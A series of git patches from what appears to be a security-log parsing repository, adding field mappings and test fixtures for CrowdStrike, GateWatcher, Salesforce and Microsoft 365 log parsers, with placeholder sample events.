\"@Version\": \"1\", \"log_name\": \"Security\", \"@event_create_date\": \"2024-11-05T11:10:19.543Z\", \"level\": \"log_always\", \"timestamp\": \"2024-11-05T11:10:20.274688148Z\", \"process_id\": 704, \"user_data\": {}, \"log_type\": \"eventlog\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"user\": {\"domain\": \"\", \"identifier\": \"\", \"name\": \"\", \"type\": \"unknown\"}, \"tenant\": \"11111111111111111111\", \"thread_id\": 9168, \"agent\": {\"dnsdomainname\": \"example.local\", \"osproducttype\": \"Windows Server 2022 Datacenter\", \"domain\": null, \"osversion\": \"10.0.20348\", \"ostype\": \"windows\", \"distroid\": null, \"domainname\": \"EXAMPLE\", \"additional_info\": {}, \"version\": \"4.1.6\", \"hostname\": \"EXAMPLE\", \"agentid\": \"555555555-9999-9999-9999-3e333333cccc\"}, \"event_id\": 4624, \"provider_guid\": \"555555555-9999-9999-9999-3e333333cccc\", \"source_name\": \"Microsoft-Windows-Security-Auditing\"}"
+  },
+  "expected": {
+    "message": "{\"event_data\": {\"RestrictedAdminMode\": \"-\", \"SubjectUserName\": \"-\", \"SubjectUserSid\": \"S-1-0-0\", \"TargetOutboundUserName\": \"-\", \"ElevatedToken\": \"%%1843\", \"VirtualAccount\": \"%%1843\", \"ProcessId\": \"0x0\", \"AuthenticationPackageName\": \"NTLM\", \"LogonProcessName\": \"NtLmSsp\", \"IpPort\": \"-\", \"WorkstationName\": \"WORKSTATION_NAME\", \"LogonGuid\": \"{00000000-0000-0000-0000-000000000000}\", \"IpAddress\": \"-\", \"TargetLinkedLogonId\": \"0x0\", \"SubjectDomainName\": \"-\", \"TargetOutboundDomainName\": \"-\", \"ImpersonationLevel\": \"%%1833\", \"SubjectLogonId\": \"0x0\", \"TargetLogonId\": \"0x6accabcc3\", \"LogonType\": \"3\", \"TargetUserSid\": \"S-1-5-21-11111111111-111111111111-11111111-111\", \"LmPackageName\": \"NTLM V2\", \"TargetUserName\": \"johndoe\", \"TransmittedServices\": \"-\", \"TargetDomainName\": \"EXAMPLE\", \"ProcessName\": \"-\", \"KeyLength\": \"128\"}, \"groups\": [], \"type\": \"wineventlog\", \"computer_name\": \"example.local\", \"destination\": \"syslog\", \"record_number\": 177355019, \"@Version\": \"1\", \"log_name\": \"Security\", \"@event_create_date\": \"2024-11-05T11:10:19.543Z\", \"level\": \"log_always\", \"timestamp\": \"2024-11-05T11:10:20.274688148Z\", \"process_id\": 704, \"user_data\": {}, \"log_type\": \"eventlog\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"user\": {\"domain\": \"\", \"identifier\": \"\", \"name\": \"\", \"type\": \"unknown\"}, \"tenant\": \"11111111111111111111\", \"thread_id\": 9168, \"agent\": {\"dnsdomainname\": \"example.local\", \"osproducttype\": \"Windows Server 2022 Datacenter\", \"domain\": null, \"osversion\": \"10.0.20348\", \"ostype\": \"windows\", \"distroid\": null, \"domainname\": \"EXAMPLE\", \"additional_info\": {}, \"version\": \"4.1.6\", \"hostname\": \"EXAMPLE\", \"agentid\": \"555555555-9999-9999-9999-3e333333cccc\"}, \"event_id\": 4624, \"provider_guid\": \"555555555-9999-9999-9999-3e333333cccc\", \"source_name\": \"Microsoft-Windows-Security-Auditing\"}",
+    "event": {
+      "action": "authentication_network",
+      "category": [
+        "authentication"
+      ],
+      "code": "4624",
+      "dataset": "eventlog",
+      "provider": "Microsoft-Windows-Security-Auditing",
+      "type": [
+        "info",
+        "start"
+      ]
+    },
+    "@timestamp": "2024-11-05T11:10:19.543000Z",
+    "action": {
+      "id": 4624,
+      "outcome": "success",
+      "properties": {
+        "AuthenticationPackageName": "NTLM",
+        "ElevatedToken": "%%1843",
+        "ImpersonationLevel": "%%1833",
+        "KeyLength": "128",
+        "LmPackageName": "NTLM V2",
+        "LogonGuid": "{00000000-0000-0000-0000-000000000000}",
+        "LogonProcessName": "NtLmSsp",
+        "LogonType": "3",
+        "ProcessId": "0x0",
+        "SubjectLogonId": "0x0",
+        "SubjectUserSid": "S-1-0-0",
+        "TargetDomainName": "EXAMPLE",
+        "TargetLinkedLogonId": "0x0",
+        "TargetLogonId": "0x6accabcc3",
+        "TargetUserName": "johndoe",
+        "TargetUserSid": "S-1-5-21-11111111111-111111111111-11111111-111",
+        "VirtualAccount": "%%1843",
+        "WorkstationName": "WORKSTATION_NAME"
+      }
+    },
+    "agent": {
+      "id": "555555555-9999-9999-9999-3e333333cccc",
+      "name": "harfanglab"
+    },
+    "harfanglab": {
+      "groups": []
+    },
+    "host": {
+      "domain": "EXAMPLE",
+      "hostname": "EXAMPLE",
+      "name": "EXAMPLE",
+      "os": {
+        "full": "Windows Server 2022 Datacenter",
+        "version": "10.0.20348"
+      }
+    },
+    "log": {
+      "hostname": "EXAMPLE"
+    },
+    "organization": {
+      "id": "11111111111111111111"
+    },
+    "related": {
+      "hosts": [
+        "EXAMPLE"
+      ]
+    },
+    "sekoiaio": {
+      "authentication": {
+        "process": {
+          "name": "NtLmSsp"
+        }
+      },
+      "client": {
+        "name": "WORKSTATION_NAME",
+        "os": {
+          "type": "windows"
+        }
+      },
+      "server": {
+        "name": "EXAMPLE",
+        "os": {
+          "type": "windows"
+        }
+      }
+    },
+    "server": {
+      "domain": "EXAMPLE"
+    },
+    "user": {
+      "id": "S-1-0-0",
+      "target": {
+        "domain": "EXAMPLE",
+        "id": "S-1-5-21-11111111111-111111111111-11111111-111",
+        "name": "johndoe"
+      }
+    }
+  }
+}
\ No newline at end of file

From eb0b0cc5c8a73329d021db69174c4f92ac35bfaa Mon Sep 17 00:00:00 2001
From: lvoloshyn-sekoia <leonid.voloshyn@sekoia.io>
Date: Mon, 11 Nov 2024 11:14:06 +0200
Subject: [PATCH 210/317] CrowdStrike Telemetry - parse ContextBaseFileName

---
 CrowdStrike/crowdstrike-telemetry/_meta/fields.yml           | 5 +++++
 CrowdStrike/crowdstrike-telemetry/ingest/parser.yml          | 3 +++
 .../crowdstrike-telemetry/tests/telemetry_event_26.json      | 1 +
 3 files changed, 9 insertions(+)

diff --git a/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml b/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml
index a59b68006..75e1b7434 100644
--- a/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml
+++ b/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml
@@ -1,3 +1,8 @@
+crowdstrike.base_filename:
+  description: Base Filename
+  name: crowdstrike.base_filename
+  type: keyword
+
 crowdstrike.customer_id:
   description: Customer ID (cid)
   name: crowdstrike.customer_id
diff --git a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml
index f5da81755..03e9819e7 100644
--- a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml
+++ b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml
@@ -53,6 +53,9 @@ stages:
           "host.domain": "{{parsed_event.message.MachineDomain}}"
           "host.mac": "{{parsed_event.message.MAC}}"
 
+      - set:
+          crowdstrike.base_filename: "{{parsed_event.message.ContextBaseFileName}}"
+
   set_registry_fields:
     actions:
       - set:
diff --git a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json
index 82baec896..1e7368eee 100644
--- a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json
+++ b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json
@@ -18,6 +18,7 @@
       "id": "111111111111111"
     },
     "crowdstrike": {
+      "base_filename": "svchost.exe",
       "customer_id": "222222222222222222222"
     },
     "file": {

From b03ca79d59d45dcd12914df6cd8e3532e5912016 Mon Sep 17 00:00:00 2001
From: Clement Lyonnet <clement.lyonnet@gatewatcher.com>
Date: Tue, 12 Nov 2024 10:23:11 +0100
Subject: [PATCH 211/317] Fixing parsed_date to match with detection and not
 analysis

---
 GateWatcher/aioniq/ingest/parser.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml
index 45330587a..ba98a034e 100644
--- a/GateWatcher/aioniq/ingest/parser.yml
+++ b/GateWatcher/aioniq/ingest/parser.yml
@@ -10,7 +10,7 @@ pipeline:
     external:
       name: date.parse
       properties:
-        input_field: "{{json_load.message.timestamp_analyzed}}"
+        input_field: "{{json_load.message.timestamp_detected}}"
         output_field: datetime
         format: null
         timezone: UTC

From 19383dc28b0a3a0e9a42995cf66cd68f11194583 Mon Sep 17 00:00:00 2001
From: Clement Lyonnet <clement.lyonnet@gatewatcher.com>
Date: Tue, 12 Nov 2024 11:43:06 +0100
Subject: [PATCH 212/317] Parsing of TLS metadata using ECS tls.server.* fields
 and two custom fields

---
 GateWatcher/aioniq/_meta/fields.yml  | 12 ++++++++----
 GateWatcher/aioniq/ingest/parser.yml | 14 +++++++++++++-
 2 files changed, 21 insertions(+), 5 deletions(-)

diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml
index d0d85f7f6..7fb7e28af 100644
--- a/GateWatcher/aioniq/_meta/fields.yml
+++ b/GateWatcher/aioniq/_meta/fields.yml
@@ -384,10 +384,14 @@ gatewatcher.tlp:
   name: gatewatcher.tlp
   type: text
 
-gatewatcher.tls:
-  description: This field represents the tls field in a network metadata (used in
-    legacy format log)
-  name: gatewatcher.tls
+gatewatcher.tls.sni:
+  description: This field represents the TLS SNI field in a TLS metadata
+  name: gatewatcher.tls.sni
+  type: text
+
+gatewatcher.tls.fingerprint:
+  description: This field represents the TLS server fingerprint field in a TLS metadata
+  name: gatewatcher.tls.fingerprint
   type: text
 
 gatewatcher.ttp:
diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml
index ba98a034e..b71064e6d 100644
--- a/GateWatcher/aioniq/ingest/parser.yml
+++ b/GateWatcher/aioniq/ingest/parser.yml
@@ -29,6 +29,8 @@ pipeline:
     description: DGA
   - name: retrohunt
     description: Retrohunt
+  - name: tls
+    description: TLS
 stages:
   common:
     actions:
@@ -122,7 +124,6 @@ stages:
           gatewatcher.sip: "{{json_load.message.sip}}"
           gatewatcher.smb: "{{json_load.message.smb}}"
           gatewatcher.ssh: "{{json_load.message.ssh}}"
-          gatewatcher.tls: "{{json_load.message.tls}}"
           file.hash.sha256: "{{json_load.message.fileinfo.sha256}}"
           gatewatcher.dhcp: "{{json_load.message.dhcp}}"
           gatewatcher.dnp3: "{{json_load.message.dnp3}}"
@@ -202,3 +203,14 @@ stages:
           gatewatcher.targeted_countries: "{{json_load.message.targeted_countries}}"
           gatewatcher.targeted_platforms: "{{json_load.message.targeted_platforms}}"
           gatewatcher.targeted_organizations: "{{json_load.message.targeted_organizations}}"
+  tls:
+    actions:
+      - set:
+         tls.server.issuer: "{{json_load.message.tls.issuerdn}}"
+         tls.server.not_before: "{{json_load.message.tls.notbefore}}"
+         tls.server.certificate_chain: "{{json_load.message.tls.chain}}"
+         tls.server.subject: "{{json_load.message.tls.subject}}"
+         gatewatcher.tls.sni: "{{json_load.message.tls.sni}}"
+         gatewatcher.tls.fingerprint: "{{json_load.message.tls.fingerprint}}"
+         tls.version: "{{json_load.message.tls.version}}"
+         tls.server.not_after: "{{json_load.message.tls.notafter}}"

From dabf885f938ac4fb194fce490569c8689ef40983 Mon Sep 17 00:00:00 2001
From: Clement Lyonnet <clement.lyonnet@gatewatcher.com>
Date: Tue, 12 Nov 2024 11:52:07 +0100
Subject: [PATCH 213/317] Updated tests

---
 GateWatcher/aioniq/tests/codebreaker.json   | 2 +-
 GateWatcher/aioniq/tests/dga.json           | 2 +-
 GateWatcher/aioniq/tests/malcore.json       | 2 +-
 GateWatcher/aioniq/tests/retrohunt.json     | 2 +-
 GateWatcher/aioniq/tests/sigflow-alert.json | 2 +-
 GateWatcher/aioniq/tests/sigflow-file.json  | 2 +-
 GateWatcher/aioniq/tests/sigflow-meta.json  | 2 +-
 7 files changed, 7 insertions(+), 7 deletions(-)

diff --git a/GateWatcher/aioniq/tests/codebreaker.json b/GateWatcher/aioniq/tests/codebreaker.json
index f16f95623..6d7eb789a 100644
--- a/GateWatcher/aioniq/tests/codebreaker.json
+++ b/GateWatcher/aioniq/tests/codebreaker.json
@@ -17,7 +17,7 @@
       "module": "powershell",
       "severity": 1
     },
-    "@timestamp": "2023-03-22T10:32:50.269000Z",
+    "@timestamp": "2023-03-22T10:30:37.145000Z",
     "destination": {
       "address": "2.2.2.2",
       "ip": "2.2.2.2",
diff --git a/GateWatcher/aioniq/tests/dga.json b/GateWatcher/aioniq/tests/dga.json
index b9db082ca..9d702ce4d 100644
--- a/GateWatcher/aioniq/tests/dga.json
+++ b/GateWatcher/aioniq/tests/dga.json
@@ -17,7 +17,7 @@
       "module": "dga",
       "severity": 1
     },
-    "@timestamp": "2023-03-22T10:46:08.487000Z",
+    "@timestamp": "2023-03-22T10:25:54.903000Z",
     "destination": {
       "address": "pgoadcmgqfacj.com",
       "domain": "pgoadcmgqfacj.com",
diff --git a/GateWatcher/aioniq/tests/malcore.json b/GateWatcher/aioniq/tests/malcore.json
index ba95cc211..b5d0a4f69 100644
--- a/GateWatcher/aioniq/tests/malcore.json
+++ b/GateWatcher/aioniq/tests/malcore.json
@@ -20,7 +20,7 @@
         "info"
       ]
     },
-    "@timestamp": "2023-03-22T10:53:13.408000Z",
+    "@timestamp": "2023-03-22T10:35:22.615000Z",
     "destination": {
       "address": "2.2.2.2",
       "ip": "2.2.2.2",
diff --git a/GateWatcher/aioniq/tests/retrohunt.json b/GateWatcher/aioniq/tests/retrohunt.json
index fd29bcfa4..7c8728304 100644
--- a/GateWatcher/aioniq/tests/retrohunt.json
+++ b/GateWatcher/aioniq/tests/retrohunt.json
@@ -17,7 +17,7 @@
       "module": "retrohunt",
       "severity": 1
     },
-    "@timestamp": "2023-06-12T10:12:39.001000Z",
+    "@timestamp": "2023-06-09T14:08:46.845000Z",
     "destination": {
       "address": "2.2.2.2",
       "ip": "2.2.2.2",
diff --git a/GateWatcher/aioniq/tests/sigflow-alert.json b/GateWatcher/aioniq/tests/sigflow-alert.json
index 1de9534f5..626ee8eb7 100644
--- a/GateWatcher/aioniq/tests/sigflow-alert.json
+++ b/GateWatcher/aioniq/tests/sigflow-alert.json
@@ -19,7 +19,7 @@
       "module": "alert",
       "severity": 1
     },
-    "@timestamp": "2023-03-22T10:44:08.001000Z",
+    "@timestamp": "2023-03-22T10:25:55.690000Z",
     "destination": {
       "address": "2.2.2.2",
       "bytes": 90364,
diff --git a/GateWatcher/aioniq/tests/sigflow-file.json b/GateWatcher/aioniq/tests/sigflow-file.json
index 2e1580dce..7e9cc8b6a 100644
--- a/GateWatcher/aioniq/tests/sigflow-file.json
+++ b/GateWatcher/aioniq/tests/sigflow-file.json
@@ -16,7 +16,7 @@
       ],
       "module": "fileinfo"
     },
-    "@timestamp": "2023-03-22T10:44:07.998000Z",
+    "@timestamp": "2023-03-22T10:25:55.469000Z",
     "destination": {
       "address": "2.2.2.2",
       "ip": "2.2.2.2",
diff --git a/GateWatcher/aioniq/tests/sigflow-meta.json b/GateWatcher/aioniq/tests/sigflow-meta.json
index 4da5dbc30..6e8cba037 100644
--- a/GateWatcher/aioniq/tests/sigflow-meta.json
+++ b/GateWatcher/aioniq/tests/sigflow-meta.json
@@ -16,7 +16,7 @@
       ],
       "module": "http"
     },
-    "@timestamp": "2023-03-22T10:44:07.997000Z",
+    "@timestamp": "2023-03-22T10:25:55.377000Z",
     "destination": {
       "address": "2.2.2.2",
       "ip": "2.2.2.2",

From 9336df505b67a0453815a0e29b09800fa904a387 Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev" <vladyslav.guriev@gmail.com>
Date: Tue, 12 Nov 2024 13:19:50 +0200
Subject: [PATCH 214/317] Fix: Salesforce login event

---
 .../salesforce-events/ingest/parser.yml       |  9 +++
 .../tests/salesforce_complete_event.json      |  6 +-
 .../tests/salesforce_complete_event_1.json    |  6 +-
 .../tests/salesforce_login_event.json         |  9 +++
 .../tests/salesforce_login_event_1.json       | 69 +++++++++++++++++++
 .../tests/session_integrity.json              | 14 ++--
 6 files changed, 107 insertions(+), 6 deletions(-)
 create mode 100644 Salesforce/salesforce-events/tests/salesforce_login_event_1.json

diff --git a/Salesforce/salesforce-events/ingest/parser.yml b/Salesforce/salesforce-events/ingest/parser.yml
index 01b66855f..54db25d6c 100644
--- a/Salesforce/salesforce-events/ingest/parser.yml
+++ b/Salesforce/salesforce-events/ingest/parser.yml
@@ -147,6 +147,14 @@ stages:
           user.name: "{{json_event.output.USERNAME}}"
         filter: "{{json_event.output.USERNAME != None}}"
 
+      - set:
+          user.name: "{{json_event.output.USER_NAME}}"
+        filter: "{{json_event.output.USER_NAME != None and '@' not in json_event.output.USER_NAME}}"
+
+      - set:
+          user.email: "{{json_event.output.USER_NAME}}"
+        filter: "{{json_event.output.USER_NAME != None and '@' in json_event.output.USER_NAME}}"
+
       - set:
           user.email: "{{json_event.output.USER}}"
         filter: "{{json_event.output.USER != None}}"
@@ -201,6 +209,7 @@ stages:
           tls.cipher: "{{json_event.output.CIPHER_SUITE}}"
           tls.version: "{{json_event.output.TLS_PROTOCOL}}"
 
+          url.original: "{{json_event.output.LOGIN_URL}}"
           host.id: "{{json_event.output.DEVICE_ID}}"
           host.os.name: "{{json_event.output.OS_NAME}}"
           host.os.version: "{{json_event.output.OS_VERSION}}"
diff --git a/Salesforce/salesforce-events/tests/salesforce_complete_event.json b/Salesforce/salesforce-events/tests/salesforce_complete_event.json
index 03b6811ee..ceeb7b881 100644
--- a/Salesforce/salesforce-events/tests/salesforce_complete_event.json
+++ b/Salesforce/salesforce-events/tests/salesforce_complete_event.json
@@ -45,6 +45,9 @@
     "related": {
       "ip": [
         "1.2.3.4"
+      ],
+      "user": [
+        "test_user"
       ]
     },
     "salesforce": {
@@ -119,7 +122,8 @@
       "query": "queryParam1=val1&queryParam2=val2"
     },
     "user": {
-      "id": "00530000009M943"
+      "id": "00530000009M943",
+      "name": "test_user"
     },
     "user_agent": {
       "device": {
diff --git a/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json b/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json
index 051638d22..89c90352a 100644
--- a/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json
+++ b/Salesforce/salesforce-events/tests/salesforce_complete_event_1.json
@@ -45,6 +45,9 @@
     "related": {
       "ip": [
         "1.2.3.4"
+      ],
+      "user": [
+        "test_user"
       ]
     },
     "salesforce": {
@@ -115,7 +118,8 @@
       "path": "/sObject/0064100000JXITSAA5/view"
     },
     "user": {
-      "id": "00530000009M943"
+      "id": "00530000009M943",
+      "name": "test_user"
     },
     "user_agent": {
       "name": "Chrome",
diff --git a/Salesforce/salesforce-events/tests/salesforce_login_event.json b/Salesforce/salesforce-events/tests/salesforce_login_event.json
index e87c6f5a9..7719dc746 100644
--- a/Salesforce/salesforce-events/tests/salesforce_login_event.json
+++ b/Salesforce/salesforce-events/tests/salesforce_login_event.json
@@ -28,6 +28,15 @@
       "address": "192.168.0.1",
       "ip": "192.168.0.1"
     },
+    "url": {
+      "domain": "login.salesforce.com",
+      "original": "https://login.salesforce.com",
+      "port": 443,
+      "registered_domain": "salesforce.com",
+      "scheme": "https",
+      "subdomain": "login",
+      "top_level_domain": "com"
+    },
     "user": {
       "email": "john.doe@example.com"
     }
diff --git a/Salesforce/salesforce-events/tests/salesforce_login_event_1.json b/Salesforce/salesforce-events/tests/salesforce_login_event_1.json
new file mode 100644
index 000000000..ed22aefee
--- /dev/null
+++ b/Salesforce/salesforce-events/tests/salesforce_login_event_1.json
@@ -0,0 +1,69 @@
+{
+  "input": {
+    "message": "{\"EVENT_TYPE\":\"Login\",\"TIMESTAMP\":\"20241026044641.024\",\"REQUEST_ID\":\"request_id_test\",\"ORGANIZATION_ID\":\"ORG_ID_TEST\",\"USER_ID\":\"USER_ID_TEST\",\"RUN_TIME\":\"47\",\"CPU_TIME\":\"12\",\"URI\":\"/services/oauth2/token\",\"SESSION_KEY\":\"\",\"LOGIN_KEY\":\"xxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"\",\"DB_TOTAL_TIME\":\"29963703\",\"LOGIN_TYPE\":\"i\",\"BROWSER_TYPE\":\"python-requests/2.28.0\",\"API_TYPE\":\"\",\"API_VERSION\":\"9998.0\",\"USER_NAME\":\"user.integration@test.com\",\"TLS_PROTOCOL\":\"TLSv1.3\",\"CIPHER_SUITE\":\"TLS_AES_256_GCM_SHA384\",\"LOGIN_URL\":\"test.my.salesforce.com\",\"AUTHENTICATION_METHOD_REFERENCE\":\"\",\"LOGIN_SUB_TYPE\":\"oauthclientcredentials\",\"AUTHENTICATION_SERVICE_ID\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-26T04:46:41.024Z\",\"USER_ID_DERIVED\":\"USER_ID_TEST_IA4\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\",\"LOGIN_STATUS\":\"LOGIN_NO_ERROR\",\"SOURCE_IP\":\"1.2.3.4\",\"FORWARDED_FOR_IP\":\"\"}"
+  },
+  "expected": {
+    "message": "{\"EVENT_TYPE\":\"Login\",\"TIMESTAMP\":\"20241026044641.024\",\"REQUEST_ID\":\"request_id_test\",\"ORGANIZATION_ID\":\"ORG_ID_TEST\",\"USER_ID\":\"USER_ID_TEST\",\"RUN_TIME\":\"47\",\"CPU_TIME\":\"12\",\"URI\":\"/services/oauth2/token\",\"SESSION_KEY\":\"\",\"LOGIN_KEY\":\"xxxxxxxxxxxxx\",\"USER_TYPE\":\"Standard\",\"REQUEST_STATUS\":\"\",\"DB_TOTAL_TIME\":\"29963703\",\"LOGIN_TYPE\":\"i\",\"BROWSER_TYPE\":\"python-requests/2.28.0\",\"API_TYPE\":\"\",\"API_VERSION\":\"9998.0\",\"USER_NAME\":\"user.integration@test.com\",\"TLS_PROTOCOL\":\"TLSv1.3\",\"CIPHER_SUITE\":\"TLS_AES_256_GCM_SHA384\",\"LOGIN_URL\":\"test.my.salesforce.com\",\"AUTHENTICATION_METHOD_REFERENCE\":\"\",\"LOGIN_SUB_TYPE\":\"oauthclientcredentials\",\"AUTHENTICATION_SERVICE_ID\":\"\",\"TIMESTAMP_DERIVED\":\"2024-10-26T04:46:41.024Z\",\"USER_ID_DERIVED\":\"USER_ID_TEST_IA4\",\"CLIENT_IP\":\"1.2.3.4\",\"URI_ID_DERIVED\":\"\",\"LOGIN_STATUS\":\"LOGIN_NO_ERROR\",\"SOURCE_IP\":\"1.2.3.4\",\"FORWARDED_FOR_IP\":\"\"}",
+    "event": {
+      "category": [
+        "authentication"
+      ],
+      "dataset": "Login",
+      "type": [
+        "start"
+      ]
+    },
+    "@timestamp": "2034-02-21T02:43:24.464103Z",
+    "organization": {
+      "id": "ORG_ID_TEST"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ]
+    },
+    "salesforce": {
+      "api": {
+        "version": "9998.0"
+      },
+      "login": {
+        "key": "xxxxxxxxxxxxx",
+        "status": "LOGIN_NO_ERROR",
+        "sub_type": "oauthclientcredentials"
+      },
+      "request": {
+        "id": "request_id_test"
+      },
+      "user": {
+        "type": "Standard"
+      }
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    },
+    "tls": {
+      "cipher": "TLS_AES_256_GCM_SHA384",
+      "version": "TLSv1.3"
+    },
+    "url": {
+      "original": "test.my.salesforce.com",
+      "path": "/services/oauth2/token"
+    },
+    "user": {
+      "email": "user.integration@test.com",
+      "id": "USER_ID_TEST"
+    },
+    "user_agent": {
+      "device": {
+        "name": "Other"
+      },
+      "name": "Python Requests",
+      "original": "python-requests/2.28.0",
+      "os": {
+        "name": "Other"
+      },
+      "version": "2.28"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Wallix/wallix-bastion/tests/session_integrity.json b/Wallix/wallix-bastion/tests/session_integrity.json
index 39e8a6363..1c01481e9 100644
--- a/Wallix/wallix-bastion/tests/session_integrity.json
+++ b/Wallix/wallix-bastion/tests/session_integrity.json
@@ -6,13 +6,19 @@
     "message": "[sessionintegrity] session_uid=\"1830c403be7caf0c00505688c380\" status=\"failed\" type=\"SSH_SHELL_SESSION\" user=\"adm@CORP.NET@1.1.1.1\" target=\"domain@local@target01.corp.net:SSH_1\" begin=\"2022-08-19 11:31:17\" end=\"2022-08-19 11:32:50\" files=[/var/wab/remote/recorded/ssh/2022-08-19/182b5714b466cba10050568e16d9,adm@CORP.NET@1.1.1.1,domain@target01.corp.net,20220819-113117,foo-bastion-bar.corp.net,1805.ttyrec]",
     "event": {
       "action": "SSH_SHELL_SESSION",
-      "category": ["session"],
+      "category": [
+        "session"
+      ],
       "dataset": "session_integrity",
       "outcome": "failure",
-      "type": ["info"]
+      "type": [
+        "info"
+      ]
     },
     "related": {
-      "user": ["adm@CORP.NET@1.1.1.1"]
+      "user": [
+        "adm@CORP.NET@1.1.1.1"
+      ]
     },
     "user": {
       "name": "adm@CORP.NET@1.1.1.1"
@@ -21,4 +27,4 @@
       "type": "SSH_SHELL_SESSION"
     }
   }
-}
+}
\ No newline at end of file

From 8ae4ab6122886eb074acbfd38cfba1780259d7f1 Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev" <vladyslav.guriev@gmail.com>
Date: Tue, 12 Nov 2024 13:21:11 +0200
Subject: [PATCH 215/317] rollback other

---
 Wallix/wallix-bastion/tests/session_integrity.json | 14 ++++----------
 1 file changed, 4 insertions(+), 10 deletions(-)

diff --git a/Wallix/wallix-bastion/tests/session_integrity.json b/Wallix/wallix-bastion/tests/session_integrity.json
index 1c01481e9..39e8a6363 100644
--- a/Wallix/wallix-bastion/tests/session_integrity.json
+++ b/Wallix/wallix-bastion/tests/session_integrity.json
@@ -6,19 +6,13 @@
     "message": "[sessionintegrity] session_uid=\"1830c403be7caf0c00505688c380\" status=\"failed\" type=\"SSH_SHELL_SESSION\" user=\"adm@CORP.NET@1.1.1.1\" target=\"domain@local@target01.corp.net:SSH_1\" begin=\"2022-08-19 11:31:17\" end=\"2022-08-19 11:32:50\" files=[/var/wab/remote/recorded/ssh/2022-08-19/182b5714b466cba10050568e16d9,adm@CORP.NET@1.1.1.1,domain@target01.corp.net,20220819-113117,foo-bastion-bar.corp.net,1805.ttyrec]",
     "event": {
       "action": "SSH_SHELL_SESSION",
-      "category": [
-        "session"
-      ],
+      "category": ["session"],
       "dataset": "session_integrity",
       "outcome": "failure",
-      "type": [
-        "info"
-      ]
+      "type": ["info"]
     },
     "related": {
-      "user": [
-        "adm@CORP.NET@1.1.1.1"
-      ]
+      "user": ["adm@CORP.NET@1.1.1.1"]
     },
     "user": {
       "name": "adm@CORP.NET@1.1.1.1"
@@ -27,4 +21,4 @@
       "type": "SSH_SHELL_SESSION"
     }
   }
-}
\ No newline at end of file
+}

From 7de6200578c1e1cf707f61343f99b60d962cdf82 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Tue, 12 Nov 2024 16:54:59 +0100
Subject: [PATCH 216/317] [Improvement] microsoft 365 / office 365 logs :
 Addition of operation properties

---
 .vscode/settings.json                         | 22 +++++
 .../microsoft-365-defender/_meta/fields.yml   |  5 +
 .../microsoft-365-defender/ingest/parser.yml  | 15 +++
 .../tests/test_cloud_app3.json                |  6 ++
 Office 365/o365/_meta/fields.yml              |  6 ++
 Office 365/o365/ingest/parser.yml             | 15 +++
 Office 365/o365/tests/clientipadress.json     |  6 ++
 .../o365/tests/exchange_item_aggregated.json  |  6 ++
 .../o365/tests/operation_properties_01.json   | 91 +++++++++++++++++++
 .../o365/tests/operation_properties_02.json   | 88 ++++++++++++++++++
 10 files changed, 260 insertions(+)
 create mode 100644 .vscode/settings.json
 create mode 100644 Office 365/o365/tests/operation_properties_01.json
 create mode 100644 Office 365/o365/tests/operation_properties_02.json

diff --git a/.vscode/settings.json b/.vscode/settings.json
new file mode 100644
index 000000000..b92839d53
--- /dev/null
+++ b/.vscode/settings.json
@@ -0,0 +1,22 @@
+{
+    "workbench.colorCustomizations": {
+        "activityBar.activeBackground": "#65c89b",
+        "activityBar.background": "#65c89b",
+        "activityBar.foreground": "#15202b",
+        "activityBar.inactiveForeground": "#15202b99",
+        "activityBarBadge.background": "#945bc4",
+        "activityBarBadge.foreground": "#e7e7e7",
+        "commandCenter.border": "#15202b99",
+        "sash.hoverBorder": "#65c89b",
+        "statusBar.background": "#42b883",
+        "statusBar.foreground": "#15202b",
+        "statusBarItem.hoverBackground": "#359268",
+        "statusBarItem.remoteBackground": "#42b883",
+        "statusBarItem.remoteForeground": "#15202b",
+        "titleBar.activeBackground": "#42b883",
+        "titleBar.activeForeground": "#15202b",
+        "titleBar.inactiveBackground": "#42b88399",
+        "titleBar.inactiveForeground": "#15202b99"
+    },
+    "peacock.color": "#42b883"
+}
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/_meta/fields.yml b/Microsoft/microsoft-365-defender/_meta/fields.yml
index 3a95175de..f69ef372d 100644
--- a/Microsoft/microsoft-365-defender/_meta/fields.yml
+++ b/Microsoft/microsoft-365-defender/_meta/fields.yml
@@ -777,6 +777,11 @@ microsoft.defender.observer.interface.type:
   name: microsoft.defender.observer.interface.type
   type: keyword
 
+microsoft.defender.operation.properties:
+  description: Additional properties of the operation
+  name: microsoft.defender.operation.properties
+  type: object
+
 microsoft.defender.report.id:
   description: Unique identifier for the event
   name: microsoft.defender.report.id
